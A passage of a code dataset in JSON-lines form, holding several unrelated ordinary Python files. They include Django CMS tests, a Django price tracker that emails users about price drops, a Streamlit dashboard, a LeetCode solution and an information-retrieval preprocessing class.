csv.writer(csv_file, delimiter=';')\n writer.writerows(to_save)\n logging.info('Arquivo de busca salvo')","repo_name":"rodrigoazs/bri_1","sub_path":"busca.py","file_name":"busca.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26739299933","text":"\"\"\"\nTests declaration for Nine CMS\n\nAll tests assume settings.LANGUAGE_CODE is defined\n\"\"\"\n__author__ = 'George Karakostas'\n__copyright__ = 'Copyright 2015, George Karakostas'\n__licence__ = 'BSD-3'\n__email__ = 'gkarak@9-dev.com'\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.utils import translation\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.core import mail\nfrom ninecms.models import Node\nfrom ninecms.tests.setup import assert_no_front, create_front, assert_front, create_basic, assert_basic, url_with_lang\nfrom ninecms.management.commands.check_updates import Capturing\nfrom ninecms.checks import check_settings\nfrom io import StringIO\n# noinspection PyPackageRequirements\nimport pip\n\n\nclass NoContentTests(TestCase):\n \"\"\" Tests with no initial content and no login \"\"\"\n \"\"\" Node System \"\"\"\n def test_node_view_with_no_content(self):\n \"\"\" Test node view if no content exists\n Explicitly remove url aliases if any remain, which has the same effect (see below)\n :return: None\n \"\"\"\n Node.objects.all().delete()\n assert_no_front(self)\n\n def test_node_view_with_no_front(self):\n \"\"\" Test node view with no / alias\n :return: None\n \"\"\"\n Node.objects.all().delete()\n create_front('/wrong-slug')\n assert_no_front(self)\n\n def test_node_view_with_front_title_not_repeating(self):\n \"\"\" Test that a front page does not repeat the title if it is the site title\n :return: None\n \"\"\"\n title = settings.SITE_NAME\n create_front('/', '', title)\n response = assert_front(self, reverse('ninecms:index'), '', title)\n self.assertContains(response, '' + title + '', html=True)\n self.assertNotContains(response, '' + title + ' | ' + title + '', html=True)\n\n def test_node_view_with_basic_two_level(self):\n \"\"\" Test basic node, two levels in alias\n Test node view of basic page, slash is missing (expecting redirect)\n Test properly, slash is not missing\n :return: None\n \"\"\"\n create_basic('about/company')\n response = assert_basic(self, 'about/company')\n self.assertRedirects(response, url_with_lang('/about/company/'), status_code=301)\n assert_basic(self, 'about/company/')\n\n def test_node_view_with_basic_wrong_alias(self):\n \"\"\" Test that a basic page with trailing / in alias is not found\n :return: None\n \"\"\"\n create_basic('about/')\n response = self.client.get(reverse('ninecms:alias', args=('about/',)))\n self.assertEqual(response.status_code, 404)\n\n def test_content_node_view_with_no_content(self):\n \"\"\" Test view with no content\n :return: None\n \"\"\"\n Node.objects.all().delete()\n translation.activate(settings.LANGUAGE_CODE)\n response = self.client.get(reverse('ninecms:content_node', args=(1,)))\n self.assertEqual(response.status_code, 404)\n\n def test_content_node_view_with_no_alias(self):\n \"\"\" Test view with a node with no path alias\n :return: None\n \"\"\"\n node_revision = create_basic('')\n assert_basic(self, node_revision.node_id, 'content_node')\n\n def test_command_check_updates(self):\n \"\"\" Test command check updates\n :return: None\n \"\"\"\n call_command('check_updates')\n with Capturing() as updates:\n pip.main(['list', '--outdated', '--retries', '1'])\n # noinspection PyUnresolvedReferences\n n = len(mail.outbox)\n if not updates:\n self.assertEqual(n, 0) # pragma: nocover\n else:\n self.assertEqual(n, 1) # pragma: nocover\n\n def test_command_cache_clear(self):\n \"\"\" Test command clear cache\n :return: None\n \"\"\"\n out = StringIO()\n call_command('cache_clear', stdout=out)\n self.assertEqual(out.getvalue(), 'Cache cleared.\\n')\n\n def test_checks(self):\n \"\"\" Test custom system checks\n :return: None\n \"\"\"\n self.assertFalse(check_settings(None))\n\n with self.settings(\n MEDIA_ROOT=None,\n MEDIA_URL=None,\n ADMINS=None,\n MANAGERS=None,\n SESSION_COOKIE_NAME='sessionid',\n CACHES={\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'KEY_PREFIX': None,\n }\n }):\n self.assertEqual(len(check_settings(None)), 6)\n","repo_name":"Wtower/django-ninecms","sub_path":"ninecms/tests/tests_no_content.py","file_name":"tests_no_content.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"27"} +{"seq_id":"40094975083","text":"import os\nimport traceback\nimport glob\nimport json\nimport re\nfrom bs4 import BeautifulSoup\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\n\nfrom utils.code_extractor import *\nfrom Thread import Thread\nfrom Metrics import eval_mentions\n\nimport sys\nsys.path.append(os.path.abspath('/app/data/'))\n\ndata_labeling_dir = \"/app/data/so_threads/\"\ntags_dir = \"/app/data/tags.json\"\ntitle_dir = \"/app/data/title.json\"\napi_method_candidates_dir = \"/app/data/api_method_candidates.json\"\n\nwith open(tags_dir, \"r\") as fp:\n tags_dict = json.load(fp)\nwith open(title_dir, \"r\") as fp:\n title_dict = json.load(fp)\nwith open(api_method_candidates_dir, \"r\") as fp:\n api_cands = json.load(fp)\n \n\ndef read_txt(filename):\n with open(filename, \"r\") as fp: \n content = fp.read()\n return content\n\ndef tokenize(text):\n count_vec = CountVectorizer(lowercase=False)\n content_vocabs = count_vec.fit([text]).vocabulary_\n tokens= (list(content_vocabs.keys()))\n return tokens, content_vocabs\n\ndef get_text_scope(mentions, thread):\n text_scope = thread.get_text_wo_label()\n \n text_scope_lines = text_scope.split(\"\\n\")\n for mention in mentions:\n line = text_scope_lines[mention['line_i']]\n line = line.replace(mention['name'], \" \", 1)\n text_scope_lines[mention['line_i']] = line\n return \"\\n\".join(text_scope_lines)\n\ndef type_scoping(mention, thread, text_scope):\n fn_name = mention['name'].split(\".\")[-1]\n fn_name_caller = \".\".join(mention['name'].split(\".\")[:-1])\n tags = thread.tags\n text_scope = thread.get_title() + \" \" +thread.get_text_wo_label() + \" \".join(tags)\n text_scope_tokens, _= tokenize(text_scope)\n candidates = deepcopy(api_cands[fn_name])\n filtered_cands = []\n for fqn, lib in candidates.items():\n for tag in tags:\n if tag in lib:\n filtered_cands.append(fqn)\n break\n candidates = filtered_cands\n score_dict = {} \n has_type_one = {}\n for can_i, can in enumerate(candidates): \n score_dict[can] = 0\n has_type_one[can] = False\n for pos_type in mention['p_types']:\n can_parts = can.split(\".\")\n can_class =can_parts[-2]\n if pos_type in can:\n if len(pos_type.split(\".\")) > 1:\n if pos_type.split(\".\")[-1] != fn_name:\n focus_str = pos_type.split(\".\")[-2]\n else:\n focus_str = pos_type.split(\".\")[-1]\n \n else:\n focus_str = pos_type.split(\".\")[-1]\n\n if focus_str == can_class:\n score_dict[can] += 1\n\n for can in candidates:\n class_name = can.split(\".\")[-2]\n if fn_name_caller != \"\":\n if fn_name_caller == class_name:\n score_dict[can] += 1\n\n if class_name in text_scope_tokens:\n score_dict[can] += 1\n\n score_list = [(api, score) for api, score in score_dict.items()]\n score_list = sorted(score_list, key=lambda api: api[1], reverse=True)\n\n if len(score_list) == 0 or score_list[0][1] == 0:\n prediction = \"None\"\n score = 0\n else:\n prediction = score_list[0][0]\n score = score_list[0][1]\n \n return prediction, score\n\n\n\n\ndef run_experiment():\n files = glob.glob(data_labeling_dir+\"/*\")\n file_dict = []\n \n # Start\n list_all_predicted_mentions = []\n for file_temp in files:\n thread_id = file_temp.split(os.sep)[-1].split(\".\")[0]\n a_thread = Thread(read_txt(file_temp), title_dict[thread_id], tags_dict[thread_id])\n \n possible_type_list = a_thread.get_possible_type_dict()\n \n p_type_dict = a_thread.extract_possible_types()\n text_mentions = a_thread.get_api_mention_text()\n \n new_text_mentions = []\n for m_idx, m in enumerate(text_mentions):\n mention = deepcopy(m)\n mention['p_types'] = []\n list_p_types = []\n simple_m_name = m['name'].split(\".\")[-1]\n prefix = \".\".join(m['name'].split(\".\")[:-1])\n if prefix != \"\":\n if prefix in p_type_dict:\n p_types_of_prefix = p_type_dict[prefix]\n for p_type in p_types_of_prefix:\n list_p_types.append(p_type)\n \n elif m['name'] in p_type_dict:\n method_related_p_types = p_type_dict[m['name']]\n for p_type in method_related_p_types:\n list_p_types.append(p_type)\n if p_type in p_type_dict:\n list_p_types += p_type_dict[p_type]\n mention['p_types'] = list(set(list_p_types))\n mention['thread'] = a_thread.thread_id\n new_text_mentions.append(mention)\n\n\n text_scope = get_text_scope(new_text_mentions, a_thread)\n for mention in new_text_mentions:\n mention['pred'], mention['score'] = type_scoping(mention, a_thread, text_scope)\n\n list_all_predicted_mentions += new_text_mentions\n\n eval_mentions(list_all_predicted_mentions)\n\nif __name__ == \"__main__\":\n print(\"Start running DATYS ...\")\n run_experiment()","repo_name":"Kienlgk/DATYS","sub_path":"src/run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30243775527","text":"import pyodbc\nimport re\nfrom Classes.GPA import GPA\nfrom Classes.Majors import Majors\nfrom Classes.UACollege import UACollege\n\n\nclass MapDBtoSPR(object):\n def __init__(self, SQLQuery):\n self.SQLQuery = SQLQuery\n self.eligibilities = []\n self.scholarshipIds = []\n\n\n def connectToTheDatabase(self):\n global cnxn, cursor\n cnxn = pyodbc.connect(r'Driver={SQL Server};Server=SUDB-DEV;Database=Spiderman;Trusted_Connection=yes;')\n cursor = cnxn.cursor()\n\n def getInfoFromDatabase(self):\n cursor.execute(self.SQLQuery)\n\n def populateEligibilitiesandScholarshipIds(self):\n self.connectToTheDatabase()\n self.getInfoFromDatabase()\n\n while 1:\n row = cursor.fetchone()\n if not row:\n break\n self.eligibilities.append(row.Elgibility)\n self.scholarshipIds.append(row.ScholarshipPackageId)\n\n return None\n\n def doGPAParser(self, eligibility, scholarshipId):\n parseGPA = GPA(eligibility, scholarshipId)\n if parseGPA.getGPA() != '':\n # print(parseGPA.getGPA())\n # print(parseGPA.getScholarshipPackageRequirementFormat().getStringValue())\n return parseGPA.getScholarshipPackageRequirementFormat()\n\n def doMajorsParser(self, eligibility, scholarshipId):\n parseMajors = Majors(eligibility, scholarshipId, Majors.majorsRegexForTesting())\n if parseMajors.getMajors() != '':\n # print(parseMajors.getMajors())\n # print(parseMajors.getScholarshipPackageRequirementFormat().getStringValue())\n return parseMajors.getScholarshipPackageRequirementFormat()\n\n def doUACollege(self, eligibility, scholarshipId):\n parseUACollege = UACollege(eligibility, scholarshipId, UACollege.uaCollegesListForTesting())\n if parseUACollege.getUACollege() != '':\n # print(parseUACollege.getUACollege())\n # print(parseUACollege.getScholarshipPackageRequirementFormat().getStringValue())\n return parseUACollege.getScholarshipPackageRequirementFormat()\n\n def loopOverEligibilities(self):\n self.populateEligibilitiesandScholarshipIds()\n for i in range(len(self.eligibilities)):\n scholarshipId = self.scholarshipIds[i]\n\n eligibility = self.eligibilities[i]\n eligibility = re.sub('<.*?>| ', '', eligibility)\n\n print('\\n\\n')\n print(scholarshipId)\n print(eligibility)\n\n splitEligibility = eligibility.split('\\n')\n for eligibility in splitEligibility:\n self.doGPAParser(eligibility, scholarshipId)\n self.doMajorsParser(eligibility, scholarshipId)\n self.doUACollege(eligibility, scholarshipId)\n\n'''\ntest = MapDBtoSPR(\n \"SELECT ScholarshipPackageId, Elgibility FROM dbo.DepartmentTestCases WHERE AttributeId =5 OR AttributeId =417 OR AttributeId=377\")\ntest.loopOverEligibilities()\n'''\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/MapDBtoSPR.py","file_name":"MapDBtoSPR.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2033915100","text":"\"\"\"\nDescrição do arquivo: este é o arquivo principal da API, aqui será feito o gerenciamento do banco de dados\n(com os comandos drop_db e create_db, por exemplo) e a execução da API (com o comando run)\nImports deste arquivo:\n Manager: permite criar comandos para usar na linha de comando com o decorator @manager.command\n create_app: cria o app já com o db setado (ver em app/main/__init__.py)\n db: objeto SQAlchemy para o gerenciamento do banco de dados através do Flask\n blueprint: objeto que registra informações a respeito das funções da API (útil para a modularização)\n\"\"\"\n\nfrom flask_script import Manager\nfrom app.main import create_app, db\nfrom app import blueprint\n\napp = create_app()\napp.register_blueprint(blueprint)\n\n# liga o contexto do 'app' ao contexto atual do script\napp.app_context().push()\n\nmanager = Manager(app)\n\n@manager.command\ndef run():\n \"\"\"Run the API\"\"\"\n app.run(debug=True, host='0.0.0.0', port=5000)\n\n@manager.command\ndef drop_db():\n \"\"\"Drop the database removing all its contents\"\"\"\n db.drop_all()\n\n@manager.command\ndef create_db():\n \"\"\"Create the database\"\"\"\n db.create_all()\n\nif __name__ == '__main__':\n manager.run()","repo_name":"matthews34/stop_down","sub_path":"api/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72323115592","text":"#colors\nbg = \"#ffffff\" #background\nedge = \"#000\" #grid lines\ntxt = \"#000000\" #text\nfill = \"#4fafff\" #filled boxes\nempty = \"#eeeeff\" #unmarked boxes\nchecked = \"#bbbbbb\" #crossed out boxes\nactive = \"#dddddd\" #hover\n\n#other variables\nmax_grid_count = 100 #maximum width or height of a new grid\noffset = 20 #padding used in windows","repo_name":"thebiene/cs152_project_2023","sub_path":"picross/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9570972195","text":"#import the required libraries \r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np \r\nimport plotly.express as px \r\nimport json\r\nfrom streamlit_lottie import st_lottie\r\n\r\n\r\nst.set_page_config(\r\n page_title=\"اســتـبـيـان المجتمع العربي\",\r\n page_icon= \"🇺🇳\",\r\n layout='wide'\r\n)\r\n\r\nst.write('', unsafe_allow_html=True)\r\n\r\n\r\n#defining lottie function to visualize animated pictures\r\ndef load_lottiefile(filepath: str):\r\n with open(filepath) as f:\r\n return json.load(f)\r\n\r\n\r\nleft_co, cent_co,last_co = st.columns(3)\r\nwith last_co:\r\n st.image(\"https://i2.wp.com/ummah-futures.net/wp-content/uploads/2019/12/%D8%A7%D9%84%D9%84%D8%AC%D9%86%D8%A9-%D8%A7%D9%84%D8%A7%D9%82%D8%AA%D8%B5%D8%A7%D8%AF%D9%8A%D8%A9-%D9%88%D8%A7%D9%84%D8%A7%D8%AC%D8%AA%D9%85%D8%A7%D8%B9%D9%8A%D8%A9-%D9%84%D8%BA%D8%B1%D8%A8%D9%8A-%D8%A2%D8%B3%D9%8A%D8%A7-1.jpg?w=500&ssl=1\")\r\nwith left_co:\r\n st.image(\"https://www.unescwa.org/sites/default/files/images/flags/Flag_of_Bahrain.svg\")\r\nst.image(\"title.PNG\")\r\n\r\n\r\nleftt_co, centt_co,lastt_co = st.columns([1,1,2])\r\nwith lastt_co :\r\n st.title('البحرين')\r\n st.image(\"SUB HEADER.PNG\")\r\n \r\ncol1, col2, col3, col4, col5, col6, col7 = st.columns(7)\r\nwith col1:\r\n st.write(\"[Population - السكان]()\")\r\n\r\nwith col2:\r\n st.write(\"[Labor - العمالة](https://docs.google.com/spreadsheets/d/1UGEiAmFwx7iiY1WV1s7l0TFz08pQPGju/edit?usp=sharing&ouid=100083186149459779256&rtpof=true&sd=true)\")\r\nwith col3:\r\n st.write(\"[Poverty - الفقر]()\")\r\nwith col4:\r\n st.write(\"[Education - التعليم]()\")\r\nwith col5:\r\n st.write(\"[Culture - الثقافة]()\")\r\nwith col6:\r\n st.write(\"[Health - الصحة]()\")\r\nwith col7:\r\n st.write(\"[Housing Conditions - المساكن]()\") \r\n \r\n\r\n#edit footer\r\npage_style= \"\"\"\r\n \"\"\"\r\n\r\nst.markdown(page_style, unsafe_allow_html=True)\r\n","repo_name":"alymaatouk/Bahrain","sub_path":"streamlit_students_dashboard.py","file_name":"streamlit_students_dashboard.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42656277410","text":"from django import forms\n\nfrom django_summernote.widgets import SummernoteWidget\n\nfrom submission import models\nfrom core import models as core_models\nfrom plugins.commission import models as comm_models\nfrom utils.forms import HTMLDateInput\n\n\nclass CommissionArticle(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n self.journal = kwargs.pop('journal')\n super(CommissionArticle, self).__init__(*args, **kwargs)\n self.fields[\n 'section'].queryset = models.Section.objects.filter(\n journal=self.journal,\n public_submissions=True,\n )\n\n def save(self, commit=True):\n article = super(CommissionArticle, self).save(commit=False)\n article.journal = self.journal\n\n if commit:\n article.save()\n\n return article\n\n class Meta:\n model = models.Article\n fields = (\n 'title',\n 'section',\n )\n\n help_texts = {\n 'owner': 'The owner must be an existing user. You can add a new '\n 'user from the manager area.',\n }\n\n\nclass DeadlineForm(forms.ModelForm):\n class Meta:\n model = comm_models.CommissionedArticle\n fields = ('deadline', 'submission_deadline', 'additional_information')\n widgets = {\n 'deadline': HTMLDateInput,\n 'submission_deadline': HTMLDateInput,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['deadline'].required = True\n\n\nclass ExistingAuthor(forms.Form):\n author = forms.ModelChoiceField(\n queryset=core_models.Account.objects.all()\n )\n\n\nclass CommissionTemplateForm(forms.ModelForm):\n class Meta:\n model = comm_models.CommissionTemplate\n fields = (\n 'name',\n 'section',\n 'template',\n 'sent_on_acceptance',\n )\n widgets = {\n 'template': SummernoteWidget(),\n }\n\n def __init__(self, *args, **kwargs):\n self.journal = kwargs.pop('journal')\n super(CommissionTemplateForm, self).__init__(*args, **kwargs)\n self.fields[\n 'section'].queryset = models.Section.objects.filter(\n journal=self.journal,\n )\n","repo_name":"BirkbeckCTP/commission","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36088198750","text":"#\n# @lc app=leetcode.cn id=498 lang=python3\n#\n# [498] 对角线遍历\n#\n# https://leetcode-cn.com/problems/diagonal-traverse/description/\n#\n# algorithms\n# Medium (42.04%)\n# Likes: 124\n# Dislikes: 0\n# Total Accepted: 23.8K\n# Total Submissions: 56.5K\n# Testcase Example: '[[1,2,3],[4,5,6],[7,8,9]]'\n#\n# 给定一个含有 M x N 个元素的矩阵(M 行,N 列),请以对角线遍历的顺序返回这个矩阵中的所有元素,对角线遍历如下图所示。\n#\n#\n#\n# 示例:\n#\n# 输入:\n# [\n# ⁠[ 1, 2, 3 ],\n# ⁠[ 4, 5, 6 ],\n# ⁠[ 7, 8, 9 ]\n# ]\n#\n# 输出: [1,2,4,7,5,3,6,8,9]\n#\n# 解释:\n#\n#\n#\n#\n#\n# 说明:\n#\n#\n# 给定矩阵中的元素总数不会超过 100000 。\n#\n#\n#\nfrom typing import List\nimport collections\n# @lc code=start\nclass Solution:\n def findDiagonalOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix: return []\n lookup = collections.defaultdict(list)\n \n row, col = len(matrix), len(matrix[0])\n\n for i in range(row):\n for j in range(col):\n lookup[j + i].append(matrix[i][j])\n \n res = []\n flag = True\n for k, v in sorted(lookup.items()):\n if flag:\n res.extend(v[::-1])\n else:\n res.extend(v)\n flag = not flag\n return res\n\n# @lc code=end\nif __name__ == \"__main__\":\n test = Solution()\n print(test.findDiagonalOrder([[1,2,3],[4,5,6],[7,8,9]]))","repo_name":"StrayCamel247/Leetcode","sub_path":"questions/498.对角线遍历.py","file_name":"498.对角线遍历.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"32142979999","text":"from typing import List\n\nclass Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n boxTypes.sort(key = lambda x:x[1], reverse = True)\n ans = 0\n for i in range(len(boxTypes)):\n size, unit = boxTypes[i]\n if truckSize >= size:\n truckSize -= size\n ans += unit * size\n else:\n ans += unit * truckSize\n break\n return ans\n\ns = Solution()\nboxTypes = [[1,3],[2,2],[3,1]]\ntruckSize = 4\nprint(s.maximumUnits(boxTypes, truckSize))","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Greedy/MaximumUnitsOnATruck.py","file_name":"MaximumUnitsOnATruck.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"73015191432","text":"from django.shortcuts import render,redirect\nfrom .forms import AddLinkForm\nfrom .models import Link\nfrom django.views import View\nfrom django.views.generic import DeleteView\nfrom django.urls import reverse_lazy\nfrom .utils import get_link_data\nfrom django.core.mail import EmailMessage\nfrom django.conf import settings\nfrom django.template.loader import render_to_string, get_template\nclass AddProduct(View):\n def post(self, request):\n postData = request.POST\n url = postData.get('url')\n no_discounted=0\n name, current_price ,erro = get_link_data(url)\n try:\n c=0\n customer=request.session['email']\n except:\n c=1\n erro=1\n target_price=postData.get('tp')\n try:\n tp=0\n target_price=float(target_price)\n except:\n tp=1\n erro = 1\n nemail=False\n qs = Link.objects.filter(customer=customer)\n items_no = qs.count()\n if items_no > 0:\n discount_list = []\n for item in qs:\n if item.target_price > item.current_price:\n if nemail:\n pass\n else:\n # sendig email\n email = EmailMessage(\n 'Price Drop‼‼‼‼〽',\n f'Hello {customer} ,'\n f'Price reduced on product {item.name}'\n f'Target price :{item.target_price}'\n f'Current Price :{item.current_price}'\n f'Buy Know>>>>>> {item.url}'\n f'Ready to track othere one!!!!',\n settings.EMAIL_HOST_USER,\n [nemail],\n )\n email.fail_silently = False\n email.send()\n discount_list.append(item)\n no_discounted = len(discount_list)\n if erro==0:\n if current_price!=target_price:\n price_diff=current_price-target_price\n price_diff=round(price_diff, 2)\n else:\n price_diff = 0\n else:\n if tp==1:\n error=\"Enter Correct Product Details\"\n elif c==1:\n error=\"Login To track a product\"\n else:\n error=\"Invalid Url or check if the product is in Offer or Not in Respective Ecommers website\"\n context = {\n 'qs': qs,\n 'items_no': items_no,\n 'no_discounted': no_discounted,\n 'error': error,\n }\n return render(request, 'links/pricetracker.html', context)\n\n product=Link(\n name=name,\n url=url,\n current_price=current_price,\n target_price=target_price,\n price_diff=price_diff,\n nemail=nemail,\n customer=customer\n )\n product.register()\n\n return redirect('pt')\n\n\ndef targetprices(request):\n postData = request.POST\n no_discounted = 0\n url = postData.get('url')\n name, current_price, erro = get_link_data(url)\n max_target =current_price-((20/100)*current_price)\n min_target =current_price-((10/100)*current_price)\n try:\n c = 0\n customer = request.session['email']\n except:\n c = 1\n erro = 1\n nemail = False\n qs = Link.objects.filter(customer=customer)\n items_no = qs.count()\n if items_no > 0:\n discount_list = []\n for item in qs:\n if item.target_price > item.current_price:\n if nemail:\n pass\n else:\n # sendig email\n ctx = {\n 'name':request.session['name'],\n 'item_name':item.name,\n 'item_target_price':item.target_price,\n 'item_current_price':item.current_price,\n 'item_url':item.url\n }\n message = get_template('pricereduceemail.html').render(ctx)\n email = EmailMessage(\n 'Price Drop‼‼‼‼〽',\n message,\n settings.EMAIL_HOST_USER,\n [request.session['email']],\n )\n email.content_subtype = \"html\"\n email.fail_silently = False\n email.send()\n discount_list.append(item)\n no_discounted = len(discount_list)\n if erro == 0:\n context = {\n 'qs': qs,\n 'items_no': items_no,\n 'no_discounted': no_discounted,\n 'max_target':max_target,\n 'min_target':min_target,\n 'url':url,\n 'for':'target',\n 'name':name,\n 'current_price':current_price\n }\n else:\n if c == 1:\n error = \"Login To track a product\"\n else:\n error = \"Invalid Url or check if the product is in Offer or Not in Respective Ecommers website\"\n context = {\n 'qs': qs,\n 'items_no': items_no,\n 'no_discounted': no_discounted,\n 'url':'',\n 'error': error,\n }\n return render(request, 'links/pricetracker.html', context)\n\n\ndef price_tracker(request):\n qs = Link.objects.all()\n for link in qs:\n link.save()\n no_discounted = 0\n error = None\n form = AddLinkForm(request.POST or None)\n\n if request.method == 'POST':\n try:\n if form.is_valid():\n form.save()\n except AttributeError:\n error = \"Opps No product found Check link \"\n except:\n error = \"Check the Url \"\n customer = request.session['email']\n form = AddLinkForm()\n qs = Link.objects.filter(customer=customer)\n items_no = qs.count()\n if items_no > 0:\n discount_list = []\n for item in qs:\n if item.target_price > item.current_price:\n if item.nemail:\n pass\n else:\n ctx = {\n 'user_name': request.session['name'],\n 'item_name': item.name,\n 'item_target_price': item.target_price,\n 'item_current_price': item.current_price,\n 'item_url': item.url\n }\n message = get_template('pricereduceemail.html').render(ctx)\n email = EmailMessage(\n 'Price Drop‼‼‼‼〽',\n message,\n settings.EMAIL_HOST_USER,\n [request.session['email']],\n )\n email.content_subtype = \"html\"\n email.fail_silently = False\n email.send()\n up=Link.objects.filter(name=item.name)\n for o in up:\n o.nemail=True\n o.save()\n discount_list.append(item)\n no_discounted = len(discount_list)\n context = {\n 'qs': qs,\n 'items_no': items_no,\n 'no_discounted': no_discounted,\n 'form': form,\n 'error': error,\n }\n\n return render(request, 'links/pricetracker.html', context)\n\n\nclass LinkDeleteView(DeleteView):\n model = Link\n template_name = 'links/confirm_del.html'\n success_url = reverse_lazy('pt')\n\n\ndef update_price(request):\n qs = Link.objects.all()\n for link in qs:\n link.save()\n return redirect('pt')\n\n","repo_name":"GOLLAPROLU-VENKATESH/E-Deals","sub_path":"price_tracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"22718481618","text":"import string\nimport unittest\n\nimport steampi\n\n\nclass TestUtilsMethods(unittest.TestCase):\n def test_build_lower_case_game_name_dictionary(self):\n lower_case_game_name_dictionary = (\n steampi.build_lower_case_game_name_dictionary()\n )\n\n assert len(lower_case_game_name_dictionary) > 0\n\n def test_remove_characters_from_str(self):\n input_str = 'Hello, World!'\n characters_to_remove = string.punctuation\n\n edited_str = steampi.remove_characters_from_str(\n input_str=input_str,\n characters_to_remove=characters_to_remove,\n )\n\n assert edited_str == 'Hello World'\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"woctezuma/steampi","sub_path":"steampi/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"40322153835","text":"from information import InformationRetrieval\nfrom similarity import Similarity\nfrom evaluation import Evaluation\nfrom preprocessing import Preprocessing\nfrom util import * \nfrom config import *\n\nfrom sys import version_info\nimport argparse\nimport json\nimport pdb\nimport numpy as np\nimport time\n\nclass SearchEngine:\n\n\tdef __init__(self, args):\n\t\tself.args = args\n\t\tself.preprocess = Preprocessing()\n\t\tself.informationRetriever = InformationRetrieval(self.args)\n\t\tself.similarity = Similarity()\n\t\tself.evaluator = Evaluation()\n\n\n\tdef preprocessQueries(self, queries):\n\n\t\t################# Segment queries ################\n\n\t\tsegmentedQueries = []\n\t\tfor query in queries:\n\t\t\tsegmentedQuery = self.preprocess.sentenceSegmentation(query)\n\t\t\tsegmentedQueries.append(segmentedQuery)\n\t\tjson.dump(segmentedQueries, open(self.args.out_folder + \"segmented_queries.txt\", 'w'))\n\n\t\t################## Tokenize queries #################\n\n\t\ttokenizedQueries = []\n\t\tfor query in segmentedQueries:\n\t\t\ttokenizedQuery = self.preprocess.tokenization(query, self.args)\n\t\t\ttokenizedQueries.append(tokenizedQuery)\n\t\tjson.dump(tokenizedQueries, open(self.args.out_folder + \"tokenized_queries.txt\", 'w'))\n\t\t\n\t\t################### Stem/Lemmatize queries #################\n\n\t\treducedQueries = []\n\t\tfor query in tokenizedQueries:\n\t\t\treducedQuery = self.preprocess.reduction(query)\n\t\t\treducedQueries.append(reducedQuery)\n\t\tjson.dump(reducedQueries, open(self.args.out_folder + \"reduced_queries.txt\", 'w'))\n\t\t\n\t\t#################### Remove stopwords from queries #################\n\n\t\tstopwordRemovedQueries = []\n\t\tfor query in reducedQueries:\n\t\t\tstopwordRemovedQuery = self.preprocess.stopwordremove(query)\n\t\t\tstopwordRemovedQueries.append(stopwordRemovedQuery)\n\t\tjson.dump(stopwordRemovedQueries, open(self.args.out_folder + \"stopword_removed_queries.txt\", 'w'))\n\n\t\tpreprocessedQueries = stopwordRemovedQueries\n\t\treturn preprocessedQueries\n\n\n\tdef preprocessDocs(self, docs):\n\n\t\t####################### Segment docs #########################\n\t\t# \n\n\t\tsegmentedDocs = []\n\t\tfor doc in docs:\n\t\t\tsegmentedDoc = self.preprocess.sentenceSegmentation(doc)\n\t\t\tsegmentedDocs.append(segmentedDoc)\n\t\tjson.dump(segmentedDocs, open(self.args.out_folder + \"segmented_docs.txt\", 'w'))\n\t\t\n\t\t####################### Tokenize docs ##########################\n\n\t\ttokenizedDocs = []\n\t\tfor doc in segmentedDocs:\n\t\t\ttokenizedDoc = self.preprocess.tokenization(doc,self.args)\n\t\t\ttokenizedDocs.append(tokenizedDoc)\n\t\tjson.dump(tokenizedDocs, open(self.args.out_folder + \"tokenized_docs.txt\", 'w'))\n\n\t\t####################### Stem/Lemmatize docs ########################\n\n\t\treducedDocs = []\n\t\tfor doc in tokenizedDocs:\n\t\t\treducedDoc = self.preprocess.reduction(doc)\n\t\t\treducedDocs.append(reducedDoc)\n\t\tjson.dump(reducedDocs, open(self.args.out_folder + \"reduced_docs.txt\", 'w'))\n\t\t\n\t\t########################## Remove stopwords from docs #############################\n\n\t\tstopwordRemovedDocs = []\n\t\tfor doc in reducedDocs:\n\t\t\tstopwordRemovedDoc = 